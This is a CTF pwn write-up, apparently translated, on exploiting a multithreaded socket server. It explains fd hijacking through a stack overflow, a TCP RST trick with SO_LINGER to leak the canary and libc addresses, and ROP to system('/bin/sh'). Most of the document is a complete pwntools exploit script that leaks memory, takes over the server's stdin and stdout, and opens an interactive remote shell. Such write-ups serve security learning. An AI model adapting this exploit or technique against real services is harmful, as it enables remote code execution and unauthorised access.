So how exactly to swap fd…? —>We have pthread, right? If we can overwrite the fd of a specific thread through multi-threading, achieving fd hijacking, can we then copy fd and redirect output, finally leaking memory information?

fd hijack

Let’s first try using two threads to see if we can indeed hijack fd. Create two threads.

Check the stack bottom in thread stack 2. The actual space is as shown above; we have plenty of space to overwrite fd.

Since the extracted qword pointer at [rbp-0x68] is resolved to the stored fd, we actually need to write 0 at offset 0x7c to finally overwrite fd.
Thus, when close is called, it actually closes the fd of thread 1.

Bypassing blocking

Since we actually closed thread 2, when allocating again, it still allocates to thread 2’s fd, not reusing 4. Therefore, before attempting to leak data, we must create 4 threads, so that eventually two threads reuse fd.

Leak

Here we need to use a TCP reset attack method. Since we obtain fd=4 again, but the originally created thread is still not closed, it will directly send an RST packet to the peer to force close the connection. At that moment, the fourth thread will take over fd=4 again (very short time), effectively achieving:

TCP_RST
TCP connection recovery. At this point, for the server that established the connection, it recovers the first thread’s connection, and because we overwrote thread 4’s fd=1, it sends stack data to thread 4’s fd=1, thus achieving a leak.

ROP

After that, how to exploit the overflow for ROP and how to interact? The idea is similar to above:

  1. Create threads, use overwrite to close one fd.
  2. Create threads again, now we can get the needed fd and corresponding thread control.
  3. Interact via standard input/output, thus we basically obtain a remote shell.

exp

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
import argparse
import socket
import struct
import time
import sys
from pwn import *

parser = argparse.ArgumentParser(description="Sequential start_conion Exploit")
parser.add_argument(
  "mode",
  choices=["0", "1", "2", "t"],
  nargs="?",
  default="0",
  help="0=local, 1=local+gdb, 2=remote, t=direct process (default:0)",
)
args = parser.parse_args()

filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"

def VIO_TEXT(x, code=95):
  """Log *x* at info level, wrapped in the ANSI colour escape *code* (default 95)."""
  coloured = "\x1b[{}m{}\x1b[0m".format(code, x)
  return log.info(coloured)

def CLEAR_TEXT(x, code=32):
  """Log *x* as a success message, wrapped in the ANSI colour escape *code* (default 32)."""
  coloured = "\x1b[{}m{}\x1b[0m".format(code, x)
  return log.success(coloured)

def stop(msg="PAUSE", code=91):
    """Show a bold coloured prompt and wait for a line of input.

    Returns the entered line, or None when stdin is at end-of-file (a blank
    line is printed in that case so the terminal is left on a fresh row).
    """
    prompt = f"\n\x1b[1;{code}m{msg}\x1b[0m"
    try:
        # input() is the Python 3 name for Python 2's raw_input().
        return input(prompt)
    except EOFError:
        print("")
        return None

context(log_level="info", os="linux", arch=arch)
if args.mode == "1":
  context.terminal = ["tmux", "splitw", "-h"]

elf = ELF(filename, checksec=False)
if libc_name:
  libc = ELF(libc_name, checksec=False)

def start_con():
  """Open a new connection: the local server for modes "0" and "t", the 172.20.0.2 target otherwise."""
  use_local = args.mode in ["0", "t"]
  host, port = ("127.0.0.1", 31337) if use_local else ("172.20.0.2", 5000)
  return remote(host, port)

def main():
  """Run the fd-hijack exploit: leak canary/ELF/libc, free fds 0 and 1, re-accept them, then ROP to system().

  In mode "1" it only starts the server binary locally and hands it to the
  user; the exploit itself is then run from a second terminal.
  """
  # Local import: the file does not import threading explicitly.
  import threading

  server_proc = None
  if args.mode in ["1"]:
    server_proc = process(filename)
    # gdb.attach(server_proc, gdbscript="""
    # set follow-fork-mode parent
    # b *(main+428)
    # c
    # """)
    time.sleep(1)  # wait for the server to bind its port
    server_proc.interactive()
    return

  VIO_TEXT("--- Starting Sequential Exploit ---")

  # 1. Open the connections and set up the race/overflow conditions
  # [s1] fd=4: sends the length header, then stays blocked
  s1 = start_con()
  time.sleep(0.1)

  # [s2] fd=5: used for the overwrite
  s2 = start_con()

  VIO_TEXT("Sending size header to s1...")
  s1.send(p64(0x100))
  time.sleep(0.25)  # must wait so that s1's thread is inside read(fd, buf, size)

  VIO_TEXT("Sending payload via s2...")
  s2.send(p64(0x100))
  # s2 sends the payload that overwrites the fd with 4 (s1's descriptor)
  s2.send(b"\x00" * 0x7C + p32(4))
  time.sleep(0.5)
  # stop("send data from s2")

  # Because of how socket fds are allocated, this connection still gets the fd
  # that served s2 rather than 4; it only acts as a buffer.
  s3 = start_con()
  time.sleep(0.1)
  # stop("get a new fd")

  # fd=4 is reused: this connection receives the leak
  s4 = start_con()
  time.sleep(0.1)

  VIO_TEXT("Triggering leak via s4...")
  s4.send(p64(0x100))
  s4.send(b"\x00" * 0x7C + p32(1))
  time.sleep(0.25)

  # 2. Trigger an RST to activate the vulnerable/error path
  # Setting SO_LINGER with l_onoff = 1, l_linger = 0 and then closing s1 makes
  # the kernel send an RST packet.
  # struct.pack("ii", l_onoff, l_linger) would also work; it is 8 bytes, the
  # same as p32(1)+p32(0).
  s1.sock.setsockopt(
    socket.SOL_SOCKET, socket.SO_LINGER, p32(1) + p32(0)
  )
  s1.sock.close()
  CLEAR_TEXT("s1 closed with RST")

  # 3. Receive and parse the leaked data
  # The server sends back 0x100 bytes of stack, which include the canary and
  # a libc address.
  try:
    leak_data = s4.recv(0x100)

  #  stop("fd 4-->1")
    if len(leak_data) < 0x90:
      log.error(f"Leak failed, received len: {len(leak_data)}")
      return

    canary = u64(leak_data[0x48:0x50])
    CLEAR_TEXT(f"Canary: {hex(canary)}")

    elf_base = u64(leak_data[0x58:0x60]) - 0x147e
    CLEAR_TEXT(f"ELF Base: {hex(elf_base)}")

    libc_base = u64(leak_data[0x88:0x90]) - 0x9c720 - 900
    CLEAR_TEXT(f"Libc Base: {hex(libc_base)}")
    libc.address = libc_base

  except EOFError:
    log.error("Unexpected EOF during leak")
    return

  # 4. Get a shell
  # Use the overwrite to make the server close fd 0 and fd 1
  s_temp = start_con()
  s_temp.send(p64(0x100))
  s_temp.send(b"\x00" * 0x7c + p32(0))
  time.sleep(0.1)
  # NOTE(review): the original comment here said "keep the connection", but
  # the call closes the client side.
  s_temp.close()

  s_temp2 = start_con()
  s_temp2.send(p64(0x100))
  s_temp2.send(b"\x00" * 0x7c + p32(1))
  time.sleep(0.1)
  s_temp2.close()

  # The server accepts the next connections on fd=0 and fd=1, which gives us
  # control of its stdin/stdout.
  # A plain integer: the original trailing comma turned this into a 1-tuple.
  ret_addr = elf_base + 0x101a
  stdin_sock = start_con()
  stdout_sock = start_con()

  VIO_TEXT("Sending ROP chain...")

  payload = b"A" * 0x48
  payload += flat([
    canary,
    0xdeadbeef,
    next(libc.search(asm('pop rdi; ret'))),
    next(libc.search(b"/bin/sh")),
    ret_addr,
    libc.sym['system']
  ])
  stdin_sock.send(p64(len(payload)))
  time.sleep(0.1)
  stdin_sock.send(payload)

  time.sleep(0.1)
  stdin_sock.sendline(b"ls")
  print(stdout_sock.recv(4096))

  def listener():
    """Copy everything the shell writes to our terminal until the socket closes."""
    while True:
      try:
        data = stdout_sock.recv(4096)
      except EOFError:
        # Connection closed: stop instead of spinning forever.
        break
      if data:
        sys.stdout.buffer.write(data)
        sys.stdout.flush()

  t = threading.Thread(target=listener, daemon=True)
  t.start()
  while True:
    cmd = input("[nan0in27 sh]$ ")
    stdin_sock.sendline(cmd.encode())
  #   print(stdout_sock.recv().decode(errors='ignore'))

if __name__ == "__main__":
  main()

Still being updated.